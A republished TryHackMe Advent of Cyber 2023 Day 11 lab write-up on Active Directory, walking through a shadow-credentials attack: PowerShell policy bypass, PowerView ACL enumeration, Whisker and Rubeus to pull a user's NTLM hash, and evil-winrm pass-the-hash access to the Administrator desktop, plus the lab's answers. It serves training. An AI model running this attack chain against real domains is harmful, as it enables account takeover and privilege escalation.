Advent of Cyber 2023 — Day 11 Writeup with Answers by Karthikeyan Nagaraj | TryHackMe
2023-12-19 01:5:50 Author: infosecwriteups.com(查看原文) 阅读量:11 收藏

TryHackMe — Active Directory [ Jingle Bells, Shadow Spells ] — While the South Pole Centre’s team has displayed remarkable expertise, their small size means they haven’t placed a strong emphasis on cyber security. With the merger ongoing and the integration of the two infrastructure systems progressing, vulnerabilities begin to surface

Karthikeyan Nagaraj

InfoSec Write-ups

AntarctiCrafts’ technology stack was very specialised. It was primarily focused on cutting-edge climate research rather than prioritising robust cyber security measures.

As the integration of the two infrastructure systems progresses, vulnerabilities begin to surface. While AntarctiCrafts’ team displays remarkable expertise, their small size means they need to emphasise cyber security awareness.

Throughout the room, you’ll see that some users have too many permissions. We addressed most of these instances in the previous audit, but is everything now sorted out from the perspective of the HR user?

Active Directory (AD) is a system mainly used by businesses in Windows environments. It’s a centralised authentication system. The Domain Controller (DC) is at the heart of AD and typically manages data storage, authentication, and authorisation within a domain.

You can think of AD as a digital database containing objects like users, groups, and computers, each with specific attributes and permissions. Ideally, it applies the principle of least privilege and uses a hierarchical approach to managing roles and giving authenticated users access to all non-sensitive data throughout the system. For this reason, assigning permissions to users must be approached cautiously, as it can potentially compromise the entire Active Directory. We’ll delve into this in the upcoming exploitation section.

Think Passwords Are Hard To Remember — Say Hello to WHfB

Microsoft introduced Windows Hello for Business (WHfB) as a modern and secure way to replace conventional password-based authentication. Instead of relying on traditional passwords, WHfB utilises cryptographic keys for user verification. Users on the Active Directory domain can access the AD using a PIN or biometrics connected to a pair of cryptographic keys: public and private. Those keys help to prove the identity of the entity to which they belong. The msDS-KeyCredentialLink is an attribute used by the Domain Controller to store the public key in WHfB for enrolling a new user device (such as a computer). In short, each user object in the Active Directory database will have its public key stored in this unique attribute.

  1. Start the TryHackMe’s VPN or Attack box
  2. Start the Machine and click split view

1. What is the hash of the vulnerable user?

Use the Below Commands one by one

1. The first command moves to the folder containing all the exploitation tools.

2. The second command will bypass the default policy for arbitrary PowerShell script execution.

3. loads the PowerView script into the memory.

cd Desktop
powershell -ep bypass
. .\PowerView.ps1
Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq “hr” } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights

4. After this, you’ll get to know the Vulnerable User — vansprinkles

5. Now Execute the below command

.\Whisker.exe add /target:vansprinkles

6. Now copy the rebeus.exe command and execute it on the same shell

7. You’ll get the NTLM Hash

Ans: 03E805D8A8C5AA435FB48832DAD620E3

2. What is the content of flag.txt on the Administrator Desktop?

  1. Open a terminal in your Attackbox or a machine that connected to tryhackme’s VPN
  2. Paste the below command to use Evil-Winrm a tool for remotely managing Windows systems abusing the Windows Remote Management (WinRM) protocol.
    evil-winrm -i THM-MACHINE-IP -u vansprinkles -H 03E805D8A8C5AA435FB48832DAD620E3
  3. Now change the directory to the admin’s desktop using the command
    cd C:\Users\Administrator\Desktop
  4. Now type dir to view the files and type flag.txt to view the flag

Use your skills to find the Answer for this Question

If you are unble to find, use the below video to find the answer


文章来源: https://infosecwriteups.com/advent-of-cyber-2023-day-11-writeup-with-answers-by-karthikeyan-nagaraj-tryhackme-21067ad0903e?source=rss----7b722bfd1b8d---4
如有侵权请联系:admin#unsafe.sh